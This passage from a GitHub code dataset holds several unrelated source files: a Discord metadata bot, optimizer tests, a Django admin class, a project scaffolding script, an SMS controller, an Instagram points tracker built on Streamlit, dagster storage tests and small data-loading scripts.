\"ComfyUI\" if \"\\\"inputs\\\"\" in data else \"NovelAI\"\n                embed = Embed(title=img_type+\" Parameters\", color=message.author.color)\n                embed.set_footer(text=f'Posted by {message.author}', icon_url=message.author.display_avatar)\n                embed.set_image(url=attachment.url)\n                await user_dm.send(embed=embed, mention_author=False)\n                with io.StringIO() as f:\n                    f.write(data)\n                    f.seek(0)\n                    await user_dm.send(file=File(f, \"parameters.yaml\"))\n        \n        except:\n            pass\n\n\n@client.message_command(name=\"View Parameters\")\nasync def message_command(ctx: ApplicationContext, message: Message):\n    \"\"\"Get raw list of parameters for every image in this post.\"\"\"\n    attachments = [a for a in message.attachments if a.filename.lower().endswith(\".png\")]\n    if not attachments:\n        await ctx.respond(\"This post contains no matching images.\", ephemeral=True)\n        return\n    await ctx.defer(ephemeral=True)\n    metadata = OrderedDict()\n    tasks = [read_attachment_metadata(i, attachment, metadata) for i, attachment in enumerate(attachments)]\n    await asyncio.gather(*tasks)\n    if not metadata:\n        await ctx.respond(f\"This post contains no image generation data.\\n{message.author.mention} needs to install [this extension](<https://github.com/ashen-sensored/sd_webui_stealth_pnginfo>).\", ephemeral=True)\n        return\n    response = \"\\n\\n\".join(metadata.values())\n    if len(response) < 1980:\n        await ctx.respond(f\"```yaml\\n{response}```\", ephemeral=True)\n    else:\n        with io.StringIO() as f:\n            f.write(response)\n            f.seek(0)\n            await 
ctx.respond(file=File(f, \"parameters.yaml\"), ephemeral=True)\n\n\nclient.run(os.environ[\"BOT_TOKEN\"])\n","repo_name":"sALTaccount/PromptInspectorBot","sub_path":"PromptInspector.py","file_name":"PromptInspector.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"19766132085","text":"import time\nimport numpy as np\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom hyperactive import Hyperactive\nfrom hyperactive.optimizers import (\n RandomSearchOptimizer,\n HillClimbingOptimizer,\n)\n\n\ndef objective_function(para):\n score = -para[\"x1\"] * para[\"x1\"]\n return score\n\n\nsearch_space = {\n \"x1\": list(np.arange(0, 100000, 0.1)),\n}\n\n\ndef test_max_score_0():\n def objective_function(para):\n score = -para[\"x1\"] * para[\"x1\"]\n return score\n\n search_space = {\n \"x1\": list(np.arange(0, 100, 0.1)),\n }\n\n max_score = -9999\n\n opt = HillClimbingOptimizer(\n epsilon=0.01,\n rand_rest_p=0,\n )\n\n hyper = Hyperactive()\n hyper.add_search(\n objective_function,\n search_space,\n optimizer=opt,\n n_iter=100000,\n initialize={\"warm_start\": [{\"x1\": 99}]},\n max_score=max_score,\n )\n hyper.run()\n\n print(\"\\n Results head \\n\", hyper.search_data(objective_function).head())\n print(\"\\n Results tail \\n\", hyper.search_data(objective_function).tail())\n\n print(\"\\nN iter:\", len(hyper.search_data(objective_function)))\n\n assert -100 > hyper.best_score(objective_function) > max_score\n\n\ndef test_max_score_1():\n def objective_function(para):\n score = -para[\"x1\"] * para[\"x1\"]\n time.sleep(0.01)\n return score\n\n search_space = {\n \"x1\": list(np.arange(0, 100, 0.1)),\n }\n\n max_score = -9999\n\n c_time = time.perf_counter()\n hyper = Hyperactive()\n hyper.add_search(\n objective_function,\n search_space,\n n_iter=100000,\n initialize={\"warm_start\": [{\"x1\": 99}]},\n max_score=max_score,\n )\n hyper.run()\n diff_time = time.perf_counter() - c_time\n\n print(\"\\n Results head \\n\", hyper.search_data(objective_function).head())\n print(\"\\n Results tail \\n\", hyper.search_data(objective_function).tail())\n\n print(\"\\nN iter:\", len(hyper.search_data(objective_function)))\n\n assert diff_time < 1\n","repo_name":"SimonBlanke/Hyperactive","sub_path":"tests/test_max_score.py","file_name":"test_max_score.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":473,"dataset":"github-code","pt":"53"} +{"seq_id":"914179059","text":"from __future__ import unicode_literals\n\nfrom django.contrib import admin\n\nfrom admin_page_lock.models.database_model import DatabasePageLockModel\n\n\nclass DatabasePageLockModelAdmin(admin.ModelAdmin):\n fields = (\n \"active\",\n \"user_reference\",\n \"locked\",\n \"url\",\n \"url_parameters\",\n \"tab_counter\",\n )\n list_display = (\n \"url\",\n \"url_parameters\",\n \"active\",\n \"user_reference\",\n \"locked\",\n \"formated_locked_at\",\n \"formated_locked_out\",\n \"tab_counter\",\n )\n list_filter = (\n \"active\",\n \"user_reference\",\n )\n list_per_page = 20\n ordering = (\"-locked_at\",)\n\n def _get_formated_datetime(self, lock_datetime):\n return lock_datetime.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\n def formated_locked_at(self, obj):\n return self._get_formated_datetime(obj.locked_at)\n\n formated_locked_at.admin_order_field = \"locked_at\"\n 
formated_locked_at.allow_tags = True\n formated_locked_at.short_description = DatabasePageLockModel._meta.get_field(\n \"locked_at\"\n ).verbose_name # noqa: E501\n\n def formated_locked_out(self, obj):\n return self._get_formated_datetime(obj.locked_out)\n\n formated_locked_out.admin_order_field = \"locked_at\"\n formated_locked_out.allow_tags = True\n formated_locked_out.short_description = DatabasePageLockModel._meta.get_field(\n \"locked_out\"\n ).verbose_name # noqa: E501\n\n\nadmin.site.register(DatabasePageLockModel, DatabasePageLockModelAdmin)\n","repo_name":"Showmax/django-admin-page-lock","sub_path":"admin_page_lock/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"10804692986","text":"'''\nStructuring your project effectively is essential for organization, maintainability, and scalability. While the specific structure may vary depending on your project's size and complexity, here's a general guide to help you structure your project:\n\n1. Root Directory:\n - README.md: Document your project, its purpose, and any instructions or notes for other developers or visitors.\n - index.html: The main HTML file that serves as the entry point for your website.\n - styles: Directory for your CSS or SCSS files.\n - scripts: Directory for your JavaScript files.\n - images: Directory to store images used in your project.\n - assets: Directory for other static assets like fonts, icons, or external libraries.\n - .gitignore: Specify files or directories that should be ignored by Git when committing changes.\n\n2. Styles:\n - main.css: The main CSS file where you can define global styles.\n - components: Directory to store CSS files specific to individual components or sections.\n - utilities: Directory for utility classes or helper CSS files (e.g., for spacing, typography, colors).\n - responsive.css: CSS file for handling responsive styles or media queries.\n - _variables.scss (if using SASS): File to define variables for colors, font sizes, etc.\n\n3. Scripts:\n - main.js: The main JavaScript file where you can define global scripts.\n - components: Directory to store JavaScript files specific to individual components or sections.\n - utilities: Directory for utility scripts or helper functions.\n - vendors: Directory to store third-party libraries or scripts.\n\n4. Images:\n - hero.jpg, logo.png, etc.: Store images used in your project.\n\n5. Assets:\n - fonts: Directory to store custom fonts.\n - icons: Directory for icon files.\n - libraries: Directory to store any external libraries or frameworks used in your project.\n\n6. Additional directories:\n - pages: If your website has multiple pages, create a directory for each page with their respective HTML, CSS, and JavaScript files.\n - data: If your website requires data storage or JSON files, create a directory for data-related files.\n\n7. Build tools (if applicable):\n - If you're using build tools like webpack, Gulp, or npm scripts, you can create additional directories or files specific to your chosen build tool.\n\nRemember that this is a general structure, and you can adapt it to your specific project needs. 
If you're using a specific framework or tool, it might have its own recommended project structure that you can follow.\n\nMaintaining a clean and well-organized project structure will help you navigate your codebase easily, collaborate with others, and ensure scalability as your project grows.\n\n\n'''\n\nimport os\n\n\ndef create_directory(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef create_file(path):\n if not os.path.exists(path):\n with open(path, 'w'):\n pass\n\n\ndef create_project_structure():\n root_dir = os.getcwd() # Set the current working directory as the root directory\n\n # Top-level directories\n directories = [\n 'assets/fonts',\n 'assets/icons',\n 'assets/libraries',\n 'data',\n 'images',\n 'pages',\n 'scripts/components',\n 'scripts/utilities',\n 'scripts/vendors',\n 'styles/components',\n 'styles/utilities'\n ]\n\n for directory in directories:\n create_directory(os.path.join(root_dir, directory))\n\n # Create individual files\n files = [\n '.gitignore',\n 'README.md',\n 'index.html',\n 'scripts/main.js',\n 'styles/main.css',\n 'assets/fonts/README.md',\n 'assets/icons/README.md',\n 'assets/libraries/README.md',\n 'data/README.md',\n 'images/README.md',\n 'pages/README.md',\n 'scripts/components/README.md',\n 'scripts/utilities/README.md',\n 'scripts/vendors/README.md',\n 'styles/components/README.md',\n 'styles/utilities/README.md'\n ]\n\n for file in files:\n create_file(os.path.join(root_dir, file))\n\n print(\"Project structure created successfully.\")\n\n\n# Run the script to create the project structure\ncreate_project_structure()\n","repo_name":"wwmogu/wwmogu.github.io","sub_path":"scripts/utilities/init_structure.py","file_name":"init_structure.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39457400206","text":"# coding: utf8\n# try something like\n@auth.requires_login()\ndef index(): \n return dict()\n\ndef send_sms():\n if auth.user.access_token and auth.user.app_id:\n numbers = \"\"\n groups=\"\"\n total_reciver=0\n for group in request.post_vars.groups.split(','):\n db_group = db(db.contact_group.user_uid == auth.user.id)(db.contact_group.name == group).select().first()\n if db_group:\n phone_numbers = db_group.contact.select(db.contact.phone_number)\n numbers += ','.join([phone.phone_number for phone in phone_numbers])\n groups += db_group.name +',' \n total_reciver +=1\n if request.post_vars.campaign_name and groups:\n groups = groups[:-1]\n campaign_id = db.campaign.insert(name=request.post_vars.campaign_name,\n groups=groups,\n msg = request.post_vars.message,\n total_reciver = total_reciver or 0)\n import urllib\n from google.appengine.api import urlfetch\n params = {'app_id': auth.user.app_id,\n 'access_token': auth.user.access_token,\n 'dest':numbers,\n 'msg':request.post_vars.message,\n 'tag':campaign_id or '',\n 'notify_url':\"http://hoiiosmschimp.appspot.com/sms_chimp/post_back/sms_post_back\"\n }\n data = urllib.urlencode(params)\n result = urlfetch.fetch(url=\"https://secure.hoiio.com/open/sms/bulk_send\",\n payload=data,\n method=urlfetch.POST,\n headers={'Content-Type': 'application/x-www-form-urlencoded'})\n \n from gluon.contrib import simplejson as json\n \n response = json.loads(result.content) \n if response['status'] == \"success_ok\":\n session.flash = \"You message's sent successful\"\n else :\n session.flash = \"Have error (%s) please try again \" % response['status']\n else:\n session.flash = \"You have to 
configure app id and access token before sending sms\"\n        redirect(URL('index'))\n\n\ndef group_selector():\n    if not request.vars.query:\n        return ''\n    query = request.vars.query\n    groups = db(db.contact_group.user_uid == auth.user.id).select(db.contact_group.name).find(lambda row: row.name.startswith(query))\n\n    return DIV(*[DIV(groups.name,\n                     _onclick=\"add_new_group('%s')\" % groups.name,\n                     _class=\"group_selector\") for groups in groups])\n","repo_name":"hunterbmt/smschimp","sub_path":"applications/sms_chimp/controllers/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9176648491","text":"import sys\nfrom PIL import Image\nimport os\n\n# USAGE:\n# arg 1: path where to save the images\n# args 2-n: images to optimize\ndef main():\n    path = sys.argv[1]\n    for x in range(2, len(sys.argv)):\n        imgsrc = sys.argv[x]\n        imgext, imgname = imgsrc[::-1].split(\".\", 1)\n        imgname = (imgname.split(\"/\", 1)[0])[::-1]\n        imgext = imgext[::-1]\n        basewidths = [512, 192, 64, 48]\n        img = Image.open(imgsrc)\n        for i in range(0, len(basewidths)):\n            wpercent = (basewidths[i] / float(img.size[0]))\n            hsize = int((float(img.size[1]) * float(wpercent)))\n            # Image.ANTIALIAS was removed in Pillow 10; LANCZOS is the same resampling filter\n            new_img = img.resize((basewidths[i], hsize), Image.LANCZOS)\n            new_name = imgname + '_' + str(basewidths[i]) + '.' + imgext\n            if imgext == \"jpg\":\n                new_img.save(path + new_name, quality=40)\n            else:\n                new_img.save(path + new_name)\nmain()\n","repo_name":"arellanoelden/create_pwa","sub_path":"optimize_images.py","file_name":"optimize_images.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19315812698","text":"import streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nimport instaloader\r\nimport schedule\r\nfrom time import sleep\r\nfrom datetime import datetime,date\r\nfrom datetime import timedelta\r\nimport os\r\n\r\nfrom dotenv import load_dotenv\r\nload_dotenv()\r\n\r\n\r\n################################### global variable declarations ############################\r\n\r\n\r\n# log-table list variables\r\nYuserName = []\r\nGrantPoint = []\r\nLikeAcount = []\r\nTimestamp = []\r\nif 'YuserName' not in st.session_state:\r\n    st.session_state[\"YuserName\"] = []\r\n\r\nif 'GrantPoint' not in st.session_state:\r\n    st.session_state[\"GrantPoint\"] = []\r\n\r\nif 'TotalPoint' not in st.session_state:\r\n    st.session_state[\"TotalPoint\"] = []\r\n\r\nif 'LikeAcount' not in st.session_state:\r\n    st.session_state[\"LikeAcount\"] = []\r\n\r\nif 'PostContent' not in st.session_state:\r\n    st.session_state[\"PostContent\"] = []\r\n\r\nif 'Timestamp' not in st.session_state:\r\n    st.session_state[\"Timestamp\"] = []\r\n\r\n# per-user record list\r\nif 'UserMemory' not in st.session_state:\r\n    st.session_state[\"UserMemory\"] = []\r\n\r\n# per-user point tally list\r\nif 'UserPoint' not in st.session_state:\r\n    st.session_state[\"UserPoint\"] = []\r\n\r\n# point-grant coefficients\r\nLIKEPOINT = 1\r\nSEARPOINT = 3\r\n\r\n# company post list\r\nPushGrant = []\r\n# previous day's count\r\nif 'PushGrantAgo' not in st.session_state:\r\n    st.session_state[\"PushGrantAgo\"] = 0\r\n\r\n# number of newly added posts\r\naddcount = 0\r\n\r\n# saved followers\r\nFollowerUser = []\r\n\r\n# accounts that liked a post\r\nLikeUser = []\r\n\r\n# data fetched for the company Instagram account\r\nprofile = \"\"\r\nposts = \"\"\r\n\r\n# define ID and password\r\nINSTAGRAM_ID = os.getenv('INSTAGRAM_ID')\r\nINSTAGRAM_PASSWORD = os.getenv('INSTAGRAM_PASSWORD')\r\nid = 
\"kamomebot11\"\r\n\r\n# company post count variables (continuously monitored)\r\nGrantCountTest = 0\r\nMaxCountTest = 0\r\nif 'MaxCountTest' not in st.session_state:\r\n    st.session_state[\"MaxCountTest\"] = 0\r\n\r\n# get the current time\r\nnowtime = []\r\n# define until what time to run\r\nsetlimit = []\r\n\r\n################################### main processing ############################\r\n\r\n# log in to Instagram (initial setup)\r\nif 'insta' not in st.session_state:\r\n    st.session_state[\"insta\"] = 0\r\n    loader = instaloader.Instaloader()\r\n    #loader.login(INSTAGRAM_ID, INSTAGRAM_PASSWORD)\r\n    profile = instaloader.Profile.from_username(loader.context, id)\r\n    posts = profile.get_posts()\r\n    GrantCountset = posts.count\r\n    st.session_state[\"MaxCountTest\"] = GrantCountset\r\n    st.write(st.session_state[\"MaxCountTest\"])\r\n\r\n\r\n# 00 initial setup function (main)\r\ndef stertf():\r\n    global MaxCountTest\r\n    profile = instaloader.Profile.from_username(loader.context, id)\r\n    posts = profile.get_posts()\r\n    GrantCountset = posts.count\r\n    MaxCountTest = GrantCountset\r\n    st.write(GrantCountset)\r\n\r\n    #i = iter(posts)\r\n    #post = next(i)\r\n    #post = next(i)\r\n    #for user in post.get_likes():\r\n    #    st.write(user.username)\r\n\r\n    # 02 register the daily schedule\r\n    schedule.every().days.at(\"00:00\").do(task)\r\n\r\n\r\n# get the current number of posts\r\ndef Grantcount():\r\n    global posts\r\n    global profile\r\n    loader = instaloader.Instaloader()\r\n    #loader.login(INSTAGRAM_ID, INSTAGRAM_PASSWORD)\r\n    profile = instaloader.Profile.from_username(loader.context, id)\r\n    posts = profile.get_posts()\r\n    GrantCountset = posts.count\r\n    return GrantCountset\r\n\r\n\r\n# check whether the company has published new posts\r\ndef Grantcheck(GrantCount):\r\n    if st.session_state[\"MaxCountTest\"] < GrantCount:\r\n        # difference = number of new posts\r\n        difference = GrantCount - st.session_state[\"MaxCountTest\"]\r\n        st.session_state[\"MaxCountTest\"] = GrantCount\r\n        return difference\r\n    else:\r\n        return 0\r\n\r\n\r\n# follower monitoring function\r\ndef Getfollowers():\r\n    global FollowerUser\r\n    global profile\r\n    for user in profile.get_followers():\r\n        FollowerUser.append(user.username)\r\n    #st.write(FollowerUser)\r\n\r\n\r\n# 01 function that is run periodically (main)\r\ndef task():\r\n    # task 1: monitor posts\r\n    GrantCount = Grantcount()\r\n    # task 2: monitor followers\r\n    Getfollowers()\r\n    # run only if new posts were added\r\n    pushcount = Grantcheck(GrantCount)\r\n    getlikeuser(pushcount)\r\n    if pushcount != 0:\r\n        #st.write(\"投稿\")\r\n        #st.write(st.session_state[\"MaxCountTest\"])\r\n        settime(pushcount)\r\n\r\n\r\n# set the timer for the like-collection window\r\ndef settime(pushcount):\r\n    global addcount\r\n    global posts\r\n    #posts = profile.get_posts()\r\n    addcount = posts.count\r\n\r\n\r\n# fetch the users who liked the monitored posts\r\ndef getlikeuser(pushcount):\r\n    global LikeUser\r\n    global posts\r\n    global id\r\n    i = iter(posts)\r\n    turn = st.session_state[\"PushGrantAgo\"] + pushcount\r\n    for push in range(turn):\r\n        post = next(i)\r\n        for user in post.get_likes():\r\n            LikeUser.append(user.username)\r\n            for follower in FollowerUser:\r\n                if follower == user.username and doubleblock(post):\r\n                    st.session_state[\"YuserName\"].append(user.username)\r\n                    st.session_state[\"GrantPoint\"].append(pointapp(1))\r\n                    st.session_state[\"TotalPoint\"].append(pointcalculation(pointapp(1), user.username))\r\n                    st.session_state[\"LikeAcount\"].append(id)\r\n                    st.session_state[\"PostContent\"].append(post)\r\n                    st.session_state[\"Timestamp\"].append(datetime.now())\r\n                    #st.write(user.username)\r\n                    #st.write(post)\r\n    st.session_state[\"PushGrantAgo\"] = pushcount\r\n    #st.write(LikeUser)\r\n\r\n\r\n# prevent awarding points twice for the same post\r\ndef doubleblock(post):\r\n    for PostContent in st.session_state[\"PostContent\"]:\r\n        if PostContent == post:\r\n            return False\r\n    
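# reaching this point means no earlier grant references this post, so points may be awarded\r\n    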
return True\r\n\r\n\r\n# point award function\r\ndef pointapp(mode):\r\n    if mode == 1:\r\n        return LIKEPOINT\r\n    if mode == 2:\r\n        return SEARPOINT\r\n\r\n\r\n# cumulative point total calculation\r\ndef pointcalculation(additionpoint, username):\r\n    indexcount = 0\r\n    st.write(username)\r\n    for user in st.session_state[\"UserMemory\"]:\r\n        if user == username:\r\n            st.session_state[\"UserPoint\"][indexcount] = st.session_state[\"UserPoint\"][indexcount] + additionpoint\r\n            st.write(st.session_state[\"UserPoint\"][indexcount])\r\n            return st.session_state[\"UserPoint\"][indexcount]\r\n        indexcount = indexcount + 1\r\n    st.write(st.session_state[\"UserMemory\"])\r\n    st.session_state[\"UserPoint\"].append(additionpoint)\r\n    st.session_state[\"UserMemory\"].append(username)\r\n    return additionpoint\r\n\r\n\r\ndef test():\r\n    st.session_state[\"insta\"] += 1\r\n    task()\r\n\r\n\r\n# 03 scheduled event loop (currently commented out)\r\n#while True:\r\n#    schedule.run_pending()\r\n#    sleep(1)\r\n\r\n############################ frontend section #######################\r\nst.title(\"Tips\")\r\n\r\nst.write(\"SNS投稿を広告以上の拡散力へ\")\r\n\r\nif st.button(\"0時になったよ!\"):\r\n    test()\r\n\r\nst.write(\"ログテーブル\")\r\ndf = pd.DataFrame({\r\n    'ユーザー名': st.session_state[\"YuserName\"],\r\n    '付与ポイント数': st.session_state[\"GrantPoint\"],\r\n    '総合ポイント数': st.session_state[\"TotalPoint\"],\r\n    'like先アカウント': st.session_state[\"LikeAcount\"],\r\n    '投稿ID': st.session_state[\"PostContent\"],\r\n    'タイムスタンプ': st.session_state[\"Timestamp\"]\r\n})\r\nst.write(\"\", df)","repo_name":"kamome-829/instalotest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9891142037","text":"import tempfile\nfrom contextlib import contextmanager\n\nimport mock\nimport pytest\nfrom dagster._core.storage.legacy_storage import LegacyScheduleStorage\nfrom dagster._core.storage.schedules import SqliteScheduleStorage\nfrom dagster._core.storage.sqlite_storage import DagsterSqliteStorage\nfrom dagster._utils.test.schedule_storage import TestScheduleStorage\n\n\n@contextmanager\ndef create_sqlite_schedule_storage():\n    with tempfile.TemporaryDirectory() as tempdir:\n        yield SqliteScheduleStorage.from_local(tempdir)\n\n\n@contextmanager\ndef create_legacy_schedule_storage():\n    with tempfile.TemporaryDirectory() as tempdir:\n        # first create the unified storage class\n        storage = DagsterSqliteStorage.from_local(tempdir)\n        # next create the legacy adapter class\n        legacy_storage = LegacyScheduleStorage(storage)\n        try:\n            yield legacy_storage\n        finally:\n            legacy_storage.dispose()\n            storage.dispose()\n\n\nclass TestSqliteScheduleStorage(TestScheduleStorage):\n    __test__ = True\n\n    @pytest.fixture(name=\"storage\", params=[create_sqlite_schedule_storage])\n    def schedule_storage(self, request):\n        with request.param() as s:\n            yield s\n\n    def test_bucket_gating(self, storage):\n        with mock.patch(\n            \"dagster._core.storage.schedules.sqlite.sqlite_schedule_storage.get_sqlite_version\",\n            return_value=\"3.7.17\",\n        ):\n            assert not storage.supports_batch_queries\n\n        with mock.patch(\n            \"dagster._core.storage.schedules.sqlite.sqlite_schedule_storage.get_sqlite_version\",\n            return_value=\"3.25.1\",\n        ):\n            assert storage.supports_batch_queries\n\n        with mock.patch(\n            \"dagster._core.storage.schedules.sqlite.sqlite_schedule_storage.get_sqlite_version\",\n            return_value=\"3.25.19\",\n        ):\n            assert storage.supports_batch_queries\n\n\nclass TestLegacyStorage(TestScheduleStorage):\n    __test__ = True\n\n    @pytest.fixture(name=\"storage\", 
params=[create_legacy_schedule_storage])\n    def schedule_storage(self, request):\n        with request.param() as s:\n            yield s\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/storage_tests/test_schedule_storage.py","file_name":"test_schedule_storage.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16717264557","text":"import pickle\r\nfrom anime_class import anime_details\r\n\r\nif __name__ == '__main__':\r\n\twith open(\"DB.file\", \"rb\") as f:\r\n\t\tdump = pickle.load(f)\r\n\r\n\tfor anime in dump:\r\n\t\tprint(anime.rank)\r\n\t\tprint(anime.name)","repo_name":"jatinkarthik-tripathy/MAL-Crawler","sub_path":"pickle test.py","file_name":"pickle test.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29347984707","text":"\"\"\"Chart plotting module\r\nFATEC - MC - Author: MCSilva - 03/11/2018 - Version: 0.0.1\r\n\"\"\"\r\n\r\nimport pygal\r\nimport copy\r\n\r\n\r\ndef gerar_graficoXY(resultado):\r\n    \"\"\"Plot an XY chart.\r\n\r\n    Arguments:\r\n        resultado {dict} -- dictionary holding the lists: ['restricoes', 'lista_completa_pares_ordenados', 'pares_ord_validos', 'lista_func_vertices_validos', 'funcao_objetivo']\r\n\r\n    Returns:\r\n        xy_chart.render_data_uri() -- chart to be rendered by Flask\r\n    \"\"\"\r\n    problema_de = {'max': 'MAXIMIZAÇÃO', 'min': 'MINIMIZAÇÃO'}\r\n    fObjetivo = resultado.get('funcao_objetivo')\r\n    restricoes = resultado.get('restricoes')\r\n\r\n    # create an XY chart instance\r\n    xy_chart = pygal.XY(show_y_guides=True, legend_at_bottom=True,\r\n                        dynamic_print_values=True, print_values_position='top',\r\n                        legend_at_bottom_columns=2, interpolate='cubic')\r\n\r\n    # set the chart title\r\n    xy_chart.title = f'PROBLEMA DE {problema_de[fObjetivo.objetivo]}\\n Solução Ótima-> {fObjetivo.rotulos[0]}({fObjetivo.letras[0]}):{fObjetivo.solucao[0]:.3f} | {fObjetivo.rotulos[1]}({fObjetivo.letras[1]}):{fObjetivo.solucao[1]:.3f} '\r\n\r\n    # add the objective function's line points to the chart\r\n    xy_chart.add(f'{fObjetivo.objetivo.upper()}: {str(fObjetivo)}',\r\n                 fObjetivo.getPontosDaReta(), stroke_style={'width': 5, 'dasharray': '3,6', 'linecap': 'round'})\r\n\r\n    # add the line points of every constraint\r\n    for i, restricao in enumerate(restricoes):\r\n        xy_chart.add(f'R{i+1}: {str(restricao)}: {restricao.inclinacao}', restricao.getPontosDaReta(),\r\n                     stroke_style={'width': 2})\r\n\r\n    # add the optimal solution point\r\n    xy_chart.add(f'SOLUÇÃO ÓTIMA: {fObjetivo.solucao}', [{'value': fObjetivo.solucao, 'node': {'r': 0}},\r\n                                                         {'value': fObjetivo.solucao, 'node': {'r': 6}, 'style': 'stroke: black; stroke-width: 5'}\r\n                                                         ], stroke_style={'width': 2})\r\n\r\n    for vertice in resultado['pares_ord_validos']:\r\n        if fObjetivo.solucao == vertice:\r\n            continue\r\n        xy_chart.add(None, [{'value': vertice, 'node': {'r': 6}},\r\n                            {'value': vertice, 'node': {'r': 0}}\r\n                            ], stroke_style={'width': 2})\r\n\r\n    # xy_chart.add(None, [{'value': (0, 40), 'node': {'r': 0}, 'style': {'fill: red; stroke: black; stroke-width: 10'},\r\n    #                     {'value': (0, 0), 'node': {'r': 0}}\r\n    #                     ], stroke_style={'dasharray': '0', 'width': 2, 'linecap': 'round', 'linejoin': 'round', 'line': 'black'\r\n    #                     })\r\n\r\n    return xy_chart.render_data_uri()\r\n\r\n\r\ndef 
gerar_grafico_line(resultado):\r\n    \"\"\"Plot a line chart.\r\n\r\n    Arguments:\r\n        resultado {dict} -- dictionary holding the lists: ['restricoes', 'lista_completa_pares_ordenados', 'pares_ord_validos', 'lista_func_vertices_validos', 'funcao_objetivo']\r\n\r\n    Returns:\r\n        chart.render_data_uri() -- chart to be rendered by Flask\r\n    \"\"\"\r\n    problema_de = {'max': 'MAXIMIZAÇÃO', 'min': 'MINIMIZAÇÃO'}\r\n    fObjetivo = resultado.get('funcao_objetivo')\r\n    vertices = resultado['pares_ord_validos']\r\n\r\n    # create the chart instance to be plotted\r\n    chart = pygal.XY(xrange=(0, int(fObjetivo.trono[0])), show_y_guides=True, legend_at_bottom=True,\r\n                     dynamic_print_values=True, print_values_position='top',\r\n                     legend_at_bottom_columns=2)\r\n\r\n    # set the chart title\r\n    chart.title = f'PROBLEMA DE {problema_de[fObjetivo.objetivo]}\\n Solução Ótima-> {fObjetivo.rotulos[0]}({fObjetivo.letras[0]}):{fObjetivo.solucao[0]:.3f} | {fObjetivo.rotulos[1]}({fObjetivo.letras[1]}):{fObjetivo.solucao[1]:.3f}'\r\n\r\n    # add the list of valid points and fill the plotted area\r\n    chart.add('REGIÃO VIÁVEL', ordenar_vertices(vertices), fill=True)\r\n\r\n    # add the objective function's line points\r\n    chart.add('FUNÇÃO OBJETIVA MAX.', fObjetivo.getPontosDaReta())\r\n\r\n    # add the optimal solution point\r\n    chart.add('SOLUÇÃO ÓTIMA', [fObjetivo.solucao], dots_size=6)\r\n\r\n    return chart.render_data_uri()\r\n\r\n\r\ndef ordenar_vertices(vertices):\r\n    \"\"\"Sort the vertices for plotting.\r\n\r\n    Arguments:\r\n        vertices {list(tuple)} -- list of tuples with the valid coordinates\r\n\r\n    Returns:\r\n        vertices_sorted {list(tuple)} -- list of tuples ordered for plotting\r\n    \"\"\"\r\n    vertices_sorted = sorted(copy.deepcopy(vertices))\r\n\r\n    for i in range(len(vertices_sorted) - 1):\r\n        if i < len(vertices_sorted)//2:\r\n            continue\r\n        if vertices_sorted[i][0] == vertices_sorted[i+1][0]:\r\n            if vertices_sorted[i][1] < vertices_sorted[i+1][1]:\r\n                vertices_sorted[i], vertices_sorted[i+1] = vertices_sorted[i+1], vertices_sorted[i]\r\n\r\n    if len(vertices_sorted) > 3:\r\n        vertices_sorted.append(vertices_sorted[0])\r\n\r\n    return vertices_sorted\r\n","repo_name":"microrepar/programacao-linear-metodo-grafico","sub_path":"app/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25640040244","text":"from sklearn import datasets, preprocessing\nfrom sklearn.utils import check_random_state\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef load_data(larger=False, method='cg'):\n    if larger and method=='cg':\n        X, y = datasets.fetch_openml('mnist_784', version=1, return_X_y=True)\n        random_state = check_random_state(0)\n        permutation = 
random_state.permutation(X.shape[0])\n X /= 255.\n X -= X.mean(axis=0)\n X = X[permutation]\n y = y[permutation]\n X = X.reshape((X.shape[0], -1))\n #truncate dataset\n data_scaler = preprocessing.MinMaxScaler()\n X = X[:1000]\n y = y[:1000]\n target_scaler = OneHotEncoder(sparse=False, categories='auto')\n return train_test_split(\n data_scaler.fit_transform(X),\n target_scaler.fit_transform(y.reshape(-1, 1)),\n test_size=(1 / 5.))\n else:\n dataset = datasets.load_iris()\n data, target = dataset.data, dataset.target\n print(data.shape, target.shape)\n data_scaler = preprocessing.MinMaxScaler()\n target_scaler = OneHotEncoder(sparse=False)\n return train_test_split(\n data_scaler.fit_transform(data),\n target_scaler.fit_transform(target.reshape(-1, 1)),\n test_size=0.15\n )\n","repo_name":"pppplin/Optimization-MP","sub_path":"MP1/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4275535808","text":"import os\nimport sys\nimport argparse\nimport subprocess\nimport unittest\nfrom PyDAIR.seq.IgSeq import IgSeq\nfrom PyDAIR.io.PyDAIRIO import *\nfrom PyDAIR.utils.PyDAIRUtils import *\nfrom PyDAIR.utils.PyDAIRArgs import *\nfrom 